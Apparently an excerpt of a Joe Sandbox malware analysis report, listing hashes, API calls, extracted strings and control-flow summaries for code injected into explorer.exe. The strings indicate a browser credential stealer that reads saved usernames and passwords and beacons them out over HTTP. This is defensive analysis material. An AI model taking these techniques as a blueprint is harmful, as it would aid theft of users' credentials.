                                                                                                                    • Opcode Fuzzy Hash: 1dbd4d9bde8ef5b9646c4471ccfa8e3af378297e707e1b386d5f402aedb4e45a
                                                                                                                    • Instruction Fuzzy Hash: B490023120240183954072986804A4E410597E1302F96D425A0015554CC95889615321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4a723561bac96872797427c930538aba4357197b738f754341c8df279a35368
                                                                                                                    • Instruction ID: 799364a17901a2572caf53e7fb4818057e102d84a51ca367ec2b6f972477b2bf
                                                                                                                    • Opcode Fuzzy Hash: e4a723561bac96872797427c930538aba4357197b738f754341c8df279a35368
                                                                                                                    • Instruction Fuzzy Hash: 1D90023520140443D51071986804646004697D0301F56D421A0424558DC69889A1A221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A64742
                                                                                                                    • ExecuteOptions, xrefs: 01A646A0
                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A646FC
                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A64655
                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A64787
                                                                                                                    • Execute=1, xrefs: 01A64713
                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A64725
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                    • API String ID: 0-484625025
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-$0$0
                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A6031E
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A602BD
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A602E7
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                    • API String ID: 0-2474120054
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 01A67B8E
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A67BAC
                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A67B7F
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 0-871070163
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A6728C
                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 01A672A3
                                                                                                                    • RTL: Re-Waiting, xrefs: 01A672C1
                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A67294
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-
                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$@
                                                                                                                    • API String ID: 0-1194432280
                                                                                                                    • Opcode ID: 30e851f40e80f24e1740baa6b9111d0512d35a76f0a07b460dd3c76061c16065
                                                                                                                    • Instruction ID: 56ca804b960a0f8867367c849c611d3dc192c5ecc625507007937bd309b8a16b
                                                                                                                    • Opcode Fuzzy Hash: 30e851f40e80f24e1740baa6b9111d0512d35a76f0a07b460dd3c76061c16065
                                                                                                                    • Instruction Fuzzy Hash: C8812A75D00269DBDB71CB54CD44BEAB7B8AB48714F0441EAEA0DB7280E7709E85CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 01A7CFBD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFilterFunc@8
                                                                                                                    • String ID: @$@4Qw@4Qw
                                                                                                                    • API String ID: 4062629308-2383119779
                                                                                                                    • Opcode ID: 91fcefbd202a0c006ef6fc5d87fcc8f62472e40f152aa4ac886e5d018fa5579f
                                                                                                                    • Instruction ID: 4b5b31e0c4affd1df08dc9de2021c15f28244fdebbf8fa31f088cf62b78f8a18
                                                                                                                    • Opcode Fuzzy Hash: 91fcefbd202a0c006ef6fc5d87fcc8f62472e40f152aa4ac886e5d018fa5579f
                                                                                                                    • Instruction Fuzzy Hash: FB41CE71900215EFCB22DFA9DD44AAEBBF8FF54B20F00442AE906DB254D734CA42CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:2.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:4.7%
                                                                                                                    Total number of Nodes:446
                                                                                                                    Total number of Limit Nodes:16

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getaddrinforecvsetsockopt
                                                                                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                    • API String ID: 1564272048-1117930895
                                                                                                                    • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                    • Instruction ID: 54cfd230e40a209d9f7350c9c4fec27dbb57d652c1da41e86b381463f69f5362
                                                                                                                    • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                    • Instruction Fuzzy Hash: FA528F34618B488BCB69EF6CC8947E9B7E1FB54300F51862ED59FC7186DE30A985CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 823142352-2679148245
                                                                                                                    • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                    • Instruction ID: 9630c0a45087f1b6bd1bd5a10cc2d7230cf367c0e2254dc549b32800b8cc40ae
                                                                                                                    • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                    • Instruction Fuzzy Hash: 55222D70A18A099FCB69DF2CC4996A9FBE1FF58305F50822ED45ED3290DB30E451DB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): entry block df10e12-df10e6e calls the helper at df0f942 and then NtProtectVirtualMemory, and branches to the two exit blocks df10e70-df10e7c and df10e7d-df10e8f.
APIs
• NtProtectVirtualMemory.NTDLL ref: 0DF10E67
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction ID: fcc2e3cacd2547bbbb22286a17cbbd2ca2ee8f27320a1bf22eca349dbddd208b
• Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
• Instruction Fuzzy Hash: 02019E34628B484F8B88EF6CD48062AB7E4FBD9214F000B3EA99AC3250EB60D5418782
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): the same code as the df10e12 function above, disassembled from the earlier entry point df10e0a. Block df10e0a-df10e38 either goes straight to df10e45-df10e6e, which calls NtProtectVirtualMemory, or passes through df10e40, which calls the helper at df0f942 first; the NtProtectVirtualMemory block branches to the exit blocks df10e70-df10e7c and df10e7d-df10e8f.
APIs
• NtProtectVirtualMemory.NTDLL ref: 0DF10E67
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: MemoryProtectVirtual
• String ID:
• API String ID: 2706961497-0
• Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction ID: 8d15d1c6741f177ed4696a64429cbb5bf181ca39f54e14dc91e5ec6e62c8abe6
• Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
• Instruction Fuzzy Hash: 5001A23462CB884B8B48EB2C94416A6B7E5FBCE314F004B3EE99AC3240DB21D5028782
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 0DF0A9A0
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: a6343ea8a1628cc35227d3d2e2a78c0b0454c3b99167d9baeddb51d45d18eb95
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 0D31D131A14A4D8BCB04EFA8C8847EDBBE0FF58205F45422AE54ED7240DE74CA45C789
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• ObtainUserAgentString.URLMON ref: 0DF0A9A0
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: AgentObtainStringUser
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 2681117516-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: ab1612027d8368dad03f27be70ba15cfae0ec38bd81b261ac1a1706884372e54
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 8721D030A14B4D8BCB04EFA8C8847EDBBE0FF58205F41822AE55AD7240DF74CA45CB89
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): entry block df06b66-df06b68 branches to df06b93-df06bb8 or to df06b6a-df06b71, which may first loop through df06b73-df06b92 back to df06b93-df06bb8. Both paths reach df06bbb-df06c22, which calls df0d612 and the helper at df0f942 twice. Block df06c28-df06c2b then either skips to df06cdc or runs df06c31-df06cd3, which calls df11da4, df11022, df113e2, df11022, df113e2 and finally CreateMutexW; from there control reaches df06cdc or df06cd5-df06cda, and both end in the exit block df06cde-df06cf6.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction ID: 52c23298a5dbc2170f8729f6217bc8ef74a6e484f020a947ec174d4446a1ebfb
• Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
• Instruction Fuzzy Hash: E7416C70918A088FDB54EFA8C8947AD7BE0FF58300F05827AD94EDB295DE30D945CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: CreateMutex
• String ID: .dll$el32$kern
• API String ID: 1964310414-1222553051
• Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction ID: 38040837baf4076c34a7c530423f06544e3c91188a700499cc1428557ad82879
• Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
• Instruction Fuzzy Hash: ED413C74918A088FDB54EFA8C894BAD7BE0FF68300F05816AD94EDB255DE30D945CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): entry block df0c72e-df0c768 reaches df0c788-df0c7ab, which calls connect, either directly or through df0c76a-df0c782, which calls the helper at df0f942 first.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction ID: 6d98d9ef1bb438bd500fa384b937db3ba46125cf94f4b9efb822a0c4c7eb6476
• Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
• Instruction Fuzzy Hash: 7F015E30618B188FCB94EF1CE488B55BBE0FB58314F1545AEE90DCB266C774D8818BC2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): the same code as the df0c72e function above, disassembled from the entry point df0c732. Block df0c732-df0c768 reaches df0c788-df0c7ab, which calls connect, either directly or through df0c76a-df0c782, which calls the helper at df0f942 first.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: connect
• String ID: conn$ect
• API String ID: 1959786783-716201944
• Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction ID: 1d7e1578d70eaa3e09af8c27287cd115024d893a86d6b30265eecce090268dbe
• Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
• Instruction Fuzzy Hash: 10012C70618A1C8FCB94EF5CE488B55BBE0FB59314F1541AEA90DCB266CB74C9818BC2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): entry block df0c6b2-df0c6e5 reaches df0c705-df0c72d, which calls send, either directly or through df0c6e7-df0c6ff, which calls the helper at df0f942 first.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: send
• String ID: send
• API String ID: 2809346765-2809346765
• Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction ID: e3b5e94b120cedcd2b426df0c5af8965b305f6dcba9c89c1e043e659438e30d7
• Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
• Instruction Fuzzy Hash: 93011270518A188FDBC4EF1CE448B257BE0EB58314F1646AED85DCB266C670D881CB85
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Control-flow graph (graph image and executed/not-executed colouring not reproduced): entry block df0c5b2-df0c5ea reaches df0c60a-df0c62b, which calls socket, either directly or through df0c5ec-df0c604, which calls the helper at df0f942 first.
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: socket
• String ID: sock
• API String ID: 98920635-2415254727
• Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction ID: 6e15fcfa19593628affc50ece752ff1eded444a8a9809e14bbc3f9f22775d623
• Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
• Instruction Fuzzy Hash: E10171306186188FCB84EF1CD448B50BBE0FB59314F1545ADE40ECB266C7B0C981CB82
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Node 417: df042dd-df04320 (call df0f942) -> 420, 421
• Node 420: df04326 -> 422
• Node 421: df043fa-df0440e
• Node 422: df04328-df04339 (SleepEx) -> 422, 423
• Node 423: df0433b-df04341 -> 424, 425
• Node 424: df04343-df04349 -> 425, 426
• Node 425: df0434b-df04352 -> 427, 428
• Node 426: df0435c-df0436a (call df0ef12) -> 427
• Node 427: df04370-df04376 -> 430, 431
• Node 428: df04354-df0435a -> 426, 427
• Node 430: df043b7-df043bd -> 432, 433
• Node 431: df04378-df0437e -> 430, 435
• Node 432: df043d4-df043db -> 422, 437
• Node 433: df043bf-df043cf (call df04e72) -> 432
• Node 435: df04380-df0438a -> 430, 438
• Node 437: df043e1-df043f5 (call df040f2) -> 422
• Node 438: df0438c-df043b1 (call df05432) -> 430
APIs
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction ID: 885156304a7034c4de8c33f5ff5f69c842339ee9ac06d63202949f9627a135f6
• Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
• Instruction Fuzzy Hash: 20318E74A08B0DDADB68EF2980482A5BBA4FB54301F45927ECA6DC7186C770D490EFD1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Node 453: df04412-df04446 (call df0f942) -> 456, 457
• Node 456: df04473-df0447d
• Node 457: df04448-df04472 (call df11c9e, CreateThread)
APIs
Memory Dump Source
• Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction ID: b0fe3dbc80a0b9b599030ae6137510b9ce2ff21653658eaeed60984f5f46a244
• Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
• Instruction Fuzzy Hash: 59F0C234668A484FD788EF2CD84563AB7D0EBA8214F45463EAA4DC3264DA29C9828716
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
• API String ID: 0-393284711
• Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction ID: fa7931d8e16fe755704f69540fecc7a763d28d29a1d6d0121991c550ca073a10
• Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
• Instruction Fuzzy Hash: 09E15774618B588FCB64EF68C484BABB7E0FB58304F505A2E969FC7245DF30E5418B89
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
• API String ID: 0-2916316912
• Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction ID: 8aa4249562f8d88fc62f4537439ba4fdebdc16958b5fadd90b1b9577281d3bac
• Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
• Instruction Fuzzy Hash: 0AB19B30618B488EDB65EF68C489AEEB7F1FF98300F40561EE59AC7251EF70D4058B86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
• API String ID: 0-1539916866
• Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction ID: b6195dea29ebad984126b29d022d5b49db1db3815147c329e7362d5acde23f28
• Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
• Instruction Fuzzy Hash: 9C41AF70B18B0C8FDB14DF98A4496BDBBE2EB48704F00025ED409E3245DBB5D9458BD6
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
• API String ID: 0-355182820
• Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction ID: 6c4e88cd4f655a61eab9df484405cf1e2bed763e5fb9d005cdafb0fb31493d88
• Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
• Instruction Fuzzy Hash: D4C16870218B598BC758EF28C885AEAF3E1FB98304F41572E959EC7250DF30E615CB86
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: .$0$c$n$r$r$r$r$r$r$r$r
• API String ID: 0-97273177
• Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction ID: a0e1720da27812bd56cdff7820716bc327cf59e23ae6a0759a048c7133b7e374
• Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
• Instruction Fuzzy Hash: F251E03061C7488FD719DF18C8816BAB7E5FB94304F502A2EE9CB87241DFB4D9068B82
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000003.00000002.3838836992.000000000DDD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DDD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ddd0000_explorer.jbxd
Similarity
• API ID:
• String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
• API String ID: 0-639201278
• Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction ID: 4b039ef357c3b0c346624a55a21a7afcc4b76a7e152ed3dcb72ff912ddef8e09
• Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
• Instruction Fuzzy Hash: 1AC19E71618A298FC758EF28D895ABAB3E1FB98304F91532D854ED7250DF30EA01CBC5
Uniqueness
